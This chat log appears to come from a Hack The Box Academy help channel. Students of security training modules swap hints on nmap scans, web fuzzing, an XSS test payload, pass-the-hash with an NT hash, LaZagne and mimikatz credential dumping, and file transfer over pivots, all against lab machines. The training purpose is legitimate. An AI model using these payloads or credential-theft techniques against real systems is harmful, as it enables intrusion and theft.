Is there a way to get a list of all the types of functions on LOLBAS? It's easy to do on GTFO bins since it's listed right at the top, but I don't know if there's such a way on LOLBAS.

hmmmmmmm
Ok, thanks for the insight

This feels like a ChatGPT question (IMO)

Just in terms of it being able to solve it for you faster than ppl on this chat

Just asked GPT and it replied saying it doesn't

No way lmao, ima check

This is directly from chatGPt

Literally copy pasted your whole question there lol

I need help with Getting Started | Public Exploits | Try to identify the services running on the server above.

I've already spent like 2 hours on this and I dont understand how to solve it, when I scan the target Ip using sudo nmap -sV -sC -p- -T5 94.237.63.215 It just gives me this:

Did you try to navigate to the ip:port given other than running nmap?

Gosh, I tried but after not loading for 5 seconds I left. Youre a lifesaver, thanks

anyone available to give me a sanity check on HTTP Attacks TE.CL module's task? just wanna ask whether my assumptions are correct

ask

I'll dm to avoid spoilers here

Hey. Im in Skill Asssement for Web Fyzzing, im @ "Before you run your page fuzzing scan, you should first run an extension fuzzing scan. What are the different extensions accepted by the domains? " i just get tvo extentions from all 3 difrent subdomains i finded, but HTB says my answare is wrong.. How do i make the answeare. like ext1. , ext2. etc or no , or what im doing wrong?

hi! I am studying for the CPTS exam and I am following the path. At the moment I'm at the Nmap Scripting Engine section. I found the flag but is not accepted...any clues?

Some times is more then one flag in the lab, maby you get the wrong one..

oh ok

Is someone available for Senior Web Penetration Tester - Intro to Whitebox Pentesting - section command and blind exploitation?

My problem was soloved

What's the question?

Feel free to dm me to avoid spoilers.

the thing is everyone on the internet found my very same flag but mine does not work. I will keep digging.

Try and see if you have any whitespace before or after the flag. Had a similar issue when I did it! If I remember correctly, it also wasn't the flag I found first

I just found the flag without even using nmap lol 😄

Well done!!

nope. not well done. I must use nmap. so i'll dig deeper with nmap 😉

Hello

Can I hack through the phone?

Don’t ask to ask

Just ask

Can I?

ok, now I did it with nmap. got it. 😉

Can admins be dm'd for questions about modules? I don't wanna spoil my module for others either, but I still have a question 🤷‍♂️

What do you mean?

So in this case don't get why people are saying don't ask to ask, if you did this for boxes you'd be banned

BEst to wait and ask - but feel free to dm me, I will reply in a few min

if you're willing to do the sanity check for me, I'd appreciate it. That's why I asked first if anyone is available hours ago

coz I don't want to just DM anyone out of blue either

I hack through my phone because I love hacking but I don't have a computer

YEah, that won't be appreciated as its for modules and not everyone does modules

but yeah, dm me 🙂

finishing some work stuff - but will reply asap

Please answer me

It's hard to say. But what are you wanting to do? Hack The Box Academy ?

So I can't right?

I am asking what exactly it is you are trying to do

I want to learn hacking and cyber security

ok bye

you can

but you need a computer

But I have just phone I don't have computer

even the cheapest lap top will do

well, then you're out of luck probably, although I think it should be possible, it requires lot of effort, and you'd spend most of your time trying to get your tooling to work. You def need a remote workstation to connect to, that's the only way I could see this happening

I just hate vi so much. You guys should do like a Tier 0 module for vi 😛

some one can help me with Web Fyzzing. Im in the qusestion: One of the pages you will identify should say 'You don't have access!'. What is the full page URL?

I get the answeares for the 2 questions before: i do fuzz in every subdomain and get one .php page with the command ffuf -w /directory-list-lowercase-2.3-small.txt:FUZZ -u http://****.academy.htb:56223/FUZZ -recursion -recursion-depth 1 -e .html,.php,.phps,.php7 -v -fs 287 and one directory but dont get the page saying "You dont Have Access" when visit the sites its just a ampty page, was try with curl 2 but nothing. When i fuzz the direcories it is showing 0.. Can some one help me out?

Get a computer, install a linux distro, sign up for a Hack the Box Academy subscrition, do all the mudles and then go do CTFS

has anyone1 done the xss module? im kinda stuck on the beginning of xss discovery part where it asks you to test the payload <HtMl%09onPoIntERENTER+=+confirm()> from a scanner to the previous exercices. am i meant to get it working or is it meant to demonstrate that the scanner payloads dont always work?

if ur phone has a large screen u can use pwnbox in the academy

I don't have money

Its just 20$ /M. But its alot off free stuff to

for real world targets you can find a 5$/month vps and use it as an attack host

Paying get more cubes and spwns off targets.. You may come along way with free

but yeah just get an old rack bro and slap an ubuntu or something on it

Why? Just use HTB or vulnhub and get some vms..

$20 computer?

idk if it is legal to use pwnbox to do other ctfs on it

What pwnbox

in-browser hacking computer

Oh ok

Hello everyone, I started going through modules on web attacks on HTB, but I don't think I understand the very essence of what I'm doing, where can I get a deeper the basics on web attacks?

The module covers 3 types of web attacks: HTTP Verb Tampering, Insecure Direct Object References (IDOR) and XML External Entity (XXE) Injection. feel free to look further on any of those attacks.

Not sure which channel to ask this in, but are there any forbidden tools on exams? Like CWEE, it has no rules on the page for prohibited tools, and I guess there's no proctoring either as with Offsec, but Burp Pro for example could give you an advantage

Going crazy.. Im in last qusetion in Skill Assesment Wbb Fuzzing; get thix: <div class='center'><p>This method is no longer used.</p></div> What other metod i going to use? im doung this: curl -X POST http://faculty.academy.htb:56223/*/*.* -d "=" -H "Content-Type: application/x-www-form-urlencoded" -H "User-Agent: Mozilla/5.0" -H

Also an extra question, if I purchase a voucher, can I access the exam right away, or you need to schedule the exam for a pre-determined time?

Try other methods ?
https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods

Its is HTB is saying this solotion is not longer used. Not the GET metod..

or POST

This I’d like to know as well

sent a msg to support about it, will put the answer if I get to know something

You can start your exam whenever you want

its not proctored, and no forbidden tools

just don't ask anyone for help

nice

I've just finished the skills assessment for the Shells & Payloads module (https://academy.hackthebox.com/module/115/section/1139). Can I DM anyone about one of the alternative paths? I'm trying to understand if I missed something

the AD sets in the Active Directory Enumeration & Attacks module, An ACE in the Hole/Stacking The Deck subsections (these who have dual IP setup) seems to take 30min+ to fully load

any insight on this one would be appreciated 😅

You removed the need for password to root. so a good ideal is to attempt to log in as root.

I'm on Attacking Web Applications with Ffuf > Skills Assessment - Web Fuzzing: "One of the pages you will identify should say 'You don't have access!'. What is the full page URL?"

I have the answer, but it's not submitting and jiggling the answer hasn't helped. E.g. I've tried:

• Literally the full url: [http]://xxxx.yyyy.zzz:pppp/dddd/page.ext
• Without the http://: xxxx.yyyy.zzz:pppp/dddd/page.ext
• Without the port
• As an IP address even though a vhost is at play

Anyone willing to DM me to check my answer is right and give me a clue what this thing wants?

yeah send over the link in your DM i think i've done this one

Hi everyone, this is maybe not the right place but I'm unable to post in General.

Has anyone taken the CREST CRT preparation course and passed the exam or was additional training required. I'm interested in hearing your journey if you've taken the CRT, what worked well and what didn't.

TIA

ask in #careers-and-certs. verify to get access -> #welcome

hey, i am stuck on a problem, can you help ?

shoot

using crackmapexec LDAP and RDP Enumeration module i managed to get the hash from svc_gmsa$, but i tryed allmost everything to get the flag.

I am stuck with a hash

Use the service account you found to access the shared folder serviceaccount and read the flag.

well, have you tried to authenticate with the hash ?

--local-auth

STATUS_LOGON_FAILURE

i can list the shares but everything else seems to be wrong

i tryed cracking the hash with hashcat but no luck, so i can use smbclient

If you can authenticate with the hash, you can read a file

have you tried passing the hash like been suggested?

you tried this, correct -H <NT HASH> ?

yes

—get-file

—spider

ok, in that case, consider what other protocols can be used to execute commands if you only tried it with smb

hint: nxc <protocol>

nxc: error: unrecognized arguments: -H HASH

bump 🙂

hey guys, I was able to solve the Firewall and IDS/IPS Evasion - Hard Lab

can someone enlight me?

ill try few things

Just do the scan without specifying the port, there you go

Do -p- instead

I did, it takes ages

I will try again

-sT -T4 tends to speed it up

mh...thanks guys, I will try again

https://tenor.com/view/spoilers-pandorica-river-song-doctor-who-gif-18293417

Look into nmap documentation if you're unsure what a command flag does

i meant something like this -H 30B3783CE2ABF1AF70F77D0660CF3453. It works with both cme and nxc, though nxc is not installed by default on kali

Dude. Stop saying the port lol

netexec was preinstalled on my kali

The point is it could have been any port

Coincidences happen

interesting, I had to install on mine, but my kali is super old

i am using -H HASH (I dont want to reveal the true hash)

thanks guys! I found THE PORT with your parameters now! love ya all ❤️

Good sign though that you thought to ask the questions instead of just mindlessly following

i MUST understand, that's the point pof real learning. thanks! 🙂

RTFM is a mantra; read the fucking manual

If the manual doesn't provide answers then question away

thanks for the insight!

I have links in my profile to websites that explain the common questioning phenomena, such as the xy problem

I will check immediatlely. I am a senior manager. I want to get CISSP but before that i want to really understand things and get CPTS and OSCP at least. I think CPTS will outclass OSCP soon as industry standard!

Especially since OSCP basically shot themselves in the foot (short term) with OSCP+

Well offsec*

yep! plus i love to program and hack things. I will get the bug bounty cert too. I did QA for ages and I was very good in finding bugs. Plus I studied front end and back end development already.

does anyone know how to get the fedora34 iso?

Honestly, and sincerely, do CWEE if you already know programming and web basics

https://docs.fedoraproject.org/en-US/releases/f34/

Googling is hard

third result...damn.

Were the first two "ads"?

almost 😄

I will!!!

for the love of god I will take them all lol

The only reason I suggest CWEE is because that sounds more up your alley than cbbh, and cbbh is honestly the weakest cert

I agree with you

basically I do not need it, I will bug hunt already after ctps and cwee

the mindset is kicking-in more and more and that is the most important thing

lol I didn't know Google existed :)))). no more seriously I asked that because every time I launch it my PC crashes

enoguh for today... No luck, i am getting errors like authentication faliure and so on. Tomorrow is another day

That's a different question entirely

well...fix the pc 😄

And should be taken up with RH/fedora support not randoms on an infosec discord

#1024429874246590575 is a gamble for help

bro, I asked this question to know if I installed fedora on the right site, nothing more complicated

I know it can sound stupid, ask chatgpt stuff too. it is very helpful.

listen to the mods...

I'm not a mod

I did, he started to talk sh.t

ops

no I don't think the pc is the problem

I mean fix the OS

Then re-download and reflash the usb you're using

oh man...

Or use a new usb entirely

even pwn box started to throw errors

Yes master 🙂

Either way; the conversation around installing fed isn't for this channel

#1024429874246590575 is a gamble but you can ask there and provide more details and maybe screenshots

👍

I have a barebone fedora machine

if you want dm me and tell me the problem

would I ssh to root?

No problem

or su to root

-Pn?

Give a shot

ah it works now but it's really slow

Cause its treating all the hosts as online

which module you are working on

thank you!

#starting-point then

is your vpn connected

This channel is for academy modules, not starting point machines

jump in vc

what ports have you found?

Move this to #starting-point

you are right

https://academy.hackthebox.com/module/244/section/2703
In source code provided with assessment '?' symbol is not present but in the page it is given.
Both are correct right

i got the flag. I restarted my computer than i used --spider and --get-file to download the flag.

That was bothering me, now its fixed

I need help with: Getting Started | Public Exploits |
"Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file"

||Using the IP and Port number and going to that address, I see what type of exploit it wants me to use, I set up the exploit and use it, but when I get the backup file, it doesn't contain any information regarding a flag or information that I can use. The file I get is /etc/passwd which is default, but when poking around and trying to run a dir scan with gobuster, I don't find any other domains that I can pull from. If I try a different path, it doesn't return anything. I have also tried accessing the /simple-backup directory, but that just shows as empty. Ive tried uploading a web shell and get close, but it fails after not receiving a 200 OK||

Idk I feel like I am way overthinking this

You're definitely overthinking

Look at the payload you're using and what can be changed, no uploads needed

I'm in the medium footprinting lab under pentest path. I found sa and alex creds but I can't login the sql. Also while looking on the HTB community webpage I saw a screen of someone else doing the same nmap scan and they have different ports open, like I don't have ssh imaps and pop3

I also tried the udp scan but it times out

It's running internally, not externally

I don't know what u mean by that

Meaning sql is running on the inside not the outside

Also consider reused passwords

Yes yes I found the sql database but the creds I found don't work

Alex and sa, i tried both of them

Try logging in as a powerful user, maybe a default account on every Windows machine

Then running the db

Having the same issue. Did you ever figure out a fix?

You saved the file to C:\

That's why it can't find the file

You need to specify the filepath

Your dir command even tells you it's in C:\

||payload being the FILEPATH ? or the backup file that gets downloaded. I'm using the wp_simple_backup_file_read exploit||

Bingo

Im going to drive into a median with my seatbelts unbluckled, I tried I swear everything but that alr thank you godsent

Use the full speedometer

ofc, if I paid for it, Im gonna use it

Doing the easy lab and have already gotten the files and changed the permissions on them but when I try and upload it tells me overwrite permission denied. Any help

In footprinting that is

Do I rm the files that are there or am I missing something

hi, i am having problems with one of the exercises. I am supposed to setup a localhost for my xxe.dtd file. The server is not accessible from outside addresses. Can anyone push me in the right direction in solving this issue please? probably some kind of firewall/security for my own protection? I'm running my own Kali Linux in VirtualBox. Thank you in advance!

Hi guys, not sure if here is the right place to ask, but do you know if the balance I get from a gift card can be used towards buying a yearly academy subscription ?

If your VM is on the VPN the target should be able to reach your VM

ah yes, i was using the wrong IP, thanks!

Blind SQL Injection module, it says on the 3rd section "Note: You can start the VM found in the question at the end of the next section for the module's practice web apps.", but there's no web app to start. I can only start the MSSQL database on all the pages. Can someone enlighten me on where the web apps can be spawned?

bump 🙂 just want to understand if what's in one of the tips was discoverable without it

I don't understand this, it says they are the same but according to wikipedia they are different but similar

Monitor mode is only for WNICs and promiscuous is for both wired and wireless interfaces right?

hi guys, still on password crackin module, in the password reuse/pasword default section. I m using the default sheet credential and i get this error
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[ERROR] invalid line in colon file (-C), missing colon in line: MySQL,admin@example.com,admin

someone can explain me?

Guys if I'm doing udp scan and the box responds to me from nmap -sU scan but doesn't respond with snmpwalk or braa what does it mean

Anyone who finished Advanced Deserialization for a few pointers on the XML Section?
I think I'm messing just the last part

Desktop of the jump host

I'm doing the password attacks section on credential hunting on windows and the issue is there's no .exe file version of lazagne

but the section requires an .exe file for lazagne

but in the lazagne github there is no such file only .py file

what should I do?

I tried looking up how to compile python to exe but I need a compliler for that and the windows host that this section uses has no access to the internet

and I can't find the .exe file anywhere in the LaZagne github that I cloned onto the Parrot attack box

You could dm bunny

Well ask him first but usually he doesn’t mind

He finished the path

Hi guys, I'm in the AD Enum and Attack module currently.
I'm trying to run bloodhound-python on the domain controller while proxing using sshuttle also tried proxychains, but I keep getting an error about DNS timeout (increasing the timeout wont solve it). I can run bloodhound-python if I ssh to the attack box.
Is there a way I can solve this?

I went with his opinion on hard modules and now I'm getting my as$ kicked 😅

@chilly geode not the place. Move on

hi is anyone able to help me with the module?

There should be an exe version, you checked the releases page of lazagne yeah?

the thing is even if I get an exe version I still can't copy exe files over to the windows box

I use cat but that doesn't let me copy entire file and

if I use text editor it won't let me view data

Sure you can

Plenty of ways to transfer files

no but like I have to be able to view data

xfreerdp has the /drive: option

ok

You can use http.server and download the file

ok

You can open an smb share...

So on and so forth

Many ways to crack an egg

ok

like this?

└──╼ [★]$ xfreerdp /v:10.129.17.140 /u:Bob /p:HTB_@cademy_stdnt! /drive:/home/Desktop/LaZagne

what am I doing wrong there

got it working with smb

or not smb but /drive option

/drive:<name>,/path/to

Ya already got that working its copying files

We’ll see how well it works after I get everything copied over

could I dm someone for a little nudge for Attacking Common Services - Hard skill assessment. (last question)

😂 yeah that’s definitely the case with the cwee modules

At least in my experience

Especially vautia knows how to make our life difficult with his sa’s

its saying the version of lazagne is incompatible with 64 bit windows but I downloaded 64 bit version

what link did you use to download? protip: it's a good idea to copy the tools from the various modules over to your box to use later.

github

well that's why, github isn't a valid link 😛

I downloaded onto attack box then copied into windows box

but I downloaded the file I didn't use a link to github itself to run it

so I'm unsure what your saying

i'm saying throwing 'github' into your browser isn't going to navigate you to a link, it's going to perform a search for 'github'. what is the actual real full link you used to download it?

git clone https://github.com/AlessandroZ/LaZagne.git```

that was to get it to attack box

then used /drive parameter in xfreerdp to copy it over

if you cloned the github you'll need to compile it, easier just to download the release

ok I am having some trouble finding the actual release. I googled it and the github was the result I got

wait found it

will try downloading now

ok

It’s funny/frustrating though how often I had to dm bunny where we had pretty much the same payload but it worked for him but not for me

And it ended up being a matter of encoding or removing a linebreak

Since then I hate web even more, but I just want to finish my oswe

I found one password but lazagne is only open to view results for a split second

how do I store results longer?

I got the answer to one question

Did you open through cmd?

Hey guys im stuck on something in the skill assement for pivoting and tunneling

don't just double click it, open a terminal and run it from there

i have a lsass.dmp that i need to transfer to my attack host and im stuck like nothing is working i just tried an http server on the machine and tried to take the file like this but its says it cant connect to remote server also ftp serve, smb etc

have you done the file transfer module?

ok I have completed the first three questions

now gonna take break then work on fourth question

I think I figured out what I was asking

just in the begining i did it from my attack host but then i remember that i havent acces to the172.16 network so i transfered mimikatz to the first pivot host i had connection with but idk why i cant transfer from pivot to target

i'd probably just setup chisel on the pivot and rdp into the machine that's on the internal vlan and transfer via rdp personally

I even ran Ysoserial as to see where I could be making a mistake.
Adapted the XML and nothing.
Web stuff makes me miss AD

I absolutely despise web but it matters most to my work

I prefer ad by miles

hey there i m new here and needed help with this question >>>>>>What does the acronym Linux PAM stand for?<<<<<<<<<<<<< PLEASE HELP IV TRIED EVERYTHING I CAN THINK OF.... AND IT STILL SAYS WRONG ANSWER.

Welcome. As you’re asking for help with a module, please state the module and section. Have you tried google?

WELL ITS THE QUESTIN ON THE "VPS HARDING" SECTION.

Google it

Just wanted to check something: If I dump password hashes for local users on a system, it's possible for those password hashes to work on other systems in the environment as well, right?

It depends

Depends on whether the same password is used? Or are there other factors too?

If it's like a default password, maybe

Often you'll have luck with, for instance, admin reuse

But yeah it'd have to be the same password to be usable. As that's what the hash is based off of

Gotcha, thanks for the clarification!

And the other machine on the network would have to have some sec settings to also allow it

sec = security?

Yes

Ntlm should be deprecated and not allowed/used, however it's just not configured

I don't follow?

Meaning the rc4/ntlm algorithm that allows for PTH is literally used bc of misconfiguration/laziness

I believe the cpts ad module explains it a bit more

Ahh, ok. I remember what you're talking about now.

I'd forgotten about it, I'm sure it's somewhere in my notes though. Gotta go back and look for it in the module.

So if it weren't for that misconfiguration/laziness, then pass-the-hash attacks wouldn't work, yeah?

idk
everything was great till last question
can i dm you regarding this?

oh woooooow, I completely missed that! Then again maybe it would have been too easy 🙂 Thank you!

Where in this chat do I post if there is a typo in one of the academy courses. Specifically Intro to Whitebox Pentesting
Code Review - Authentication. The validateEmail snippet says SIP instead of SNIP

#1234357888114364508

Thank you

Where can i chat if I am seeking help regarding a task in the footprinting module of the pentester path ?

This is the place 👌

M on the IMAP module in Pentester path trying to enumerate this server using imap
Used openssl, curl and whatnot
I used the default robin:robin credentials.
Now I am connecting to imap server and getting the cert issuer email ID as cto.dev@dev.inlanefreight.htb And that should be the admin email ID right ?? But the answer is wrong so I am clueless as to what is the correct answer.

Also for the next question which is finding the flag, I have connected to IMAP and am using IMAP commands to navigate to the flag, but I seem to be super confused about how to access the message.

I don't want the answers to them but I hate being stuck and clueless about stuff that should supposedly be simple 🙂
ANyways here is an SS for context :

I guess i cannot paste an SS here

What am I doing wrong? Should be quite simple..

Hi, do you recommend to use Windows as OS while doing windows binary attack modules?

you need the pipe <command> | grep "<whatever>".

Im currently using wine, but not feeling 100% comf

i did google it and it still says i was wrong??

CAN SOMEONEPLEASE HELP ME WITH THIS QUESTION!!!

Caps please 👀 and your screenshot is a 404

https://tenor.com/view/tyler-hynes-hynies-roadhouse-romance-loud-cover-ears-gif-23049952

@modern sparrow please, post without caps. No need for them.